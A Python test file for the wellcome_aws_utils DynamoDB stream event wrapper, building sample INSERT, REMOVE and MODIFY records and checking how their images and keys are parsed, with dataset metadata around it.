b2c54b44fcd7edf9877903f1b0ef1aba853926c3
|
[
"MIT"
] | null | null | null |
# -*- encoding: utf-8 -*-
from wellcome_aws_utils import dynamo_event
event_source_arn = (
"arn:aws:dynamodb:us-east-1:123456789012:"
"table/BarkTable/stream/2016-11-16T20:42:48.104"
)
def create_insert_record(message):
return {
"ApproximateCreationDateTime": 1479499740,
"Keys": {
"Timestamp": {
"S": "2016-11-18:12:09:36"
},
"Username": {
"S": "John Doe"
}
},
"NewImage": {
"Timestamp": {
"S": "2016-11-18:12:09:36"
},
"Message": {
"S": message
},
"Username": {
"S": "John Doe"
}
},
"SequenceNumber": "13021600000000001596893679",
"SizeBytes": 112,
"StreamViewType": "NEW_IMAGE"
}
def create_remove_record(message):
return {
"ApproximateCreationDateTime": 1479499740,
"Keys": {
"Timestamp": {
"S": "2016-11-18:12:09:36"
},
"Username": {
"S": "John Doe"
}
},
"OldImage": {
"Timestamp": {
"S": "2016-11-18:12:09:36"
},
"Message": {
"S": message
},
"Username": {
"S": "John Doe"
}
},
"SequenceNumber": "13021600000000001596893679",
"SizeBytes": 112,
"StreamViewType": "OLD_IMAGE"
}
def create_modify_record(old_message, new_message):
return {
"ApproximateCreationDateTime": 1479499740,
"Keys": {
"Timestamp": {
"S": "2016-11-18:12:09:36"
},
"Username": {
"S": "John Doe"
}
},
"OldImage": {
"Timestamp": {
"S": "2016-11-18:12:09:36"
},
"Message": {
"S": old_message
},
"Username": {
"S": "John Doe"
}
},
"NewImage": {
"Timestamp": {
"S": "2016-11-18:12:09:36"
},
"Message": {
"S": new_message
},
"Username": {
"S": "John Doe"
}
},
"SequenceNumber": "13021600000000001596893679",
"SizeBytes": 112,
"StreamViewType": "NEW_AND_OLD_IMAGES"
}
def create_modify_record_keys_only():
return {
"ApproximateCreationDateTime": 1479499740,
"Keys": {
"Timestamp": {
"S": "2016-11-18:12:09:36"
},
"Username": {
"S": "John Doe"
}
},
"SequenceNumber": "13021600000000001596893679",
"SizeBytes": 112,
"StreamViewType": "KEYS_ONLY"
}
def create_insert_event(message):
return {
"eventID": "7de3041dd709b024af6f29e4fa13d34c",
"eventName": "INSERT",
"eventVersion": "1.1",
"eventSource": "aws:dynamodb",
"awsRegion": "us-west-2",
"dynamodb": create_insert_record(message),
"eventSourceARN": event_source_arn
}
def create_remove_event(message):
return {
"eventID": "7de3041dd709b024af6f29e4fa13d34c",
"eventName": "REMOVE",
"eventVersion": "1.1",
"eventSource": "aws:dynamodb",
"awsRegion": "us-west-2",
"dynamodb": create_remove_record(message),
"eventSourceARN": event_source_arn
}
def create_modify_event(old_message, new_message):
return {
"eventID": "7de3041dd709b024af6f29e4fa13d34c",
"eventName": "MODIFY",
"eventVersion": "1.1",
"eventSource": "aws:dynamodb",
"awsRegion": "us-west-2",
"dynamodb": create_modify_record(old_message, new_message),
"eventSourceARN": event_source_arn
}
def create_modify_event_keys_only():
return {
"eventID": "7de3041dd709b024af6f29e4fa13d34c",
"eventName": "MODIFY",
"eventVersion": "1.1",
"eventSource": "aws:dynamodb",
"awsRegion": "us-west-2",
"dynamodb": create_modify_record_keys_only(),
"eventSourceARN": event_source_arn
}
def test_get_source_arn():
dynamo_image = dynamo_event.DynamoEvent(create_insert_event('foo'))
assert dynamo_image.event_source_arn == event_source_arn
def test_insert_event():
dynamo_image = dynamo_event.DynamoEvent(create_insert_event('foo'))
expected_image_with_deserialized_values = {
'Message': 'foo',
'Timestamp': '2016-11-18:12:09:36',
'Username': 'John Doe'
}
expected_image = {
"Timestamp": {
"S": "2016-11-18:12:09:36"
},
"Message": {
"S": 'foo'
},
"Username": {
"S": "John Doe"
}
}
assert dynamo_image.new_image(
deserialize_values=True
) == expected_image_with_deserialized_values
assert dynamo_image.new_image() == expected_image
def test_remove_event():
dynamo_image = dynamo_event.DynamoEvent(create_remove_event('foo'))
expected_image_with_deserialized_values = {
'Message': 'foo',
'Timestamp': '2016-11-18:12:09:36',
'Username': 'John Doe'
}
expected_image = {
"Timestamp": {
"S": "2016-11-18:12:09:36"
},
"Message": {
"S": 'foo'
},
"Username": {
"S": "John Doe"
}
}
assert dynamo_image.new_image(deserialize_values=True) is None
assert dynamo_image.new_image() is None
assert dynamo_image.old_image(
deserialize_values=True
) == expected_image_with_deserialized_values
assert dynamo_image.old_image() == expected_image
def test_modify_event():
dynamo_image = dynamo_event.DynamoEvent(create_modify_event('foo', 'bar'))
expected_old_image_with_deserialized_values = {
'Message': 'foo',
'Timestamp': '2016-11-18:12:09:36',
'Username': 'John Doe'
}
expected_old_image = {
"Timestamp": {
"S": "2016-11-18:12:09:36"
},
"Message": {
"S": 'foo'
},
"Username": {
"S": "John Doe"
}
}
expected_new_image_with_deserialized_values = {
'Message': 'bar',
'Timestamp': '2016-11-18:12:09:36',
'Username': 'John Doe'
}
expected_new_image = {
"Timestamp": {
"S": "2016-11-18:12:09:36"
},
"Message": {
"S": 'bar'
},
"Username": {
"S": "John Doe"
}
}
assert dynamo_image.new_image(
deserialize_values=True
) == expected_new_image_with_deserialized_values
assert dynamo_image.new_image() == expected_new_image
assert dynamo_image.old_image(
deserialize_values=True
) == expected_old_image_with_deserialized_values
assert dynamo_image.old_image() == expected_old_image
def test_modify_event_keys_only():
dynamo_image = dynamo_event.DynamoEvent(create_modify_event_keys_only())
assert dynamo_image.new_image(deserialize_values=True) is None
assert dynamo_image.new_image() is None
assert dynamo_image.old_image(deserialize_values=True) is None
assert dynamo_image.old_image() is None
assert dynamo_image.keys(deserialize_values=True) == {
'Timestamp': '2016-11-18:12:09:36',
'Username': 'John Doe'
}
assert dynamo_image.keys() == {
"Timestamp": {
"S": "2016-11-18:12:09:36"
},
"Username": {
"S": "John Doe"
}
}
| 25.445902
| 78
| 0.525061
| 724
| 7,761
| 5.375691
| 0.11326
| 0.062179
| 0.036999
| 0.046249
| 0.903905
| 0.849178
| 0.795221
| 0.767986
| 0.727903
| 0.637718
| 0
| 0.102729
| 0.339003
| 7,761
| 304
| 79
| 25.529605
| 0.655945
| 0.002964
| 0
| 0.573643
| 0
| 0
| 0.2606
| 0.055067
| 0
| 0
| 0
| 0
| 0.065891
| 1
| 0.050388
| false
| 0
| 0.003876
| 0.031008
| 0.085271
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.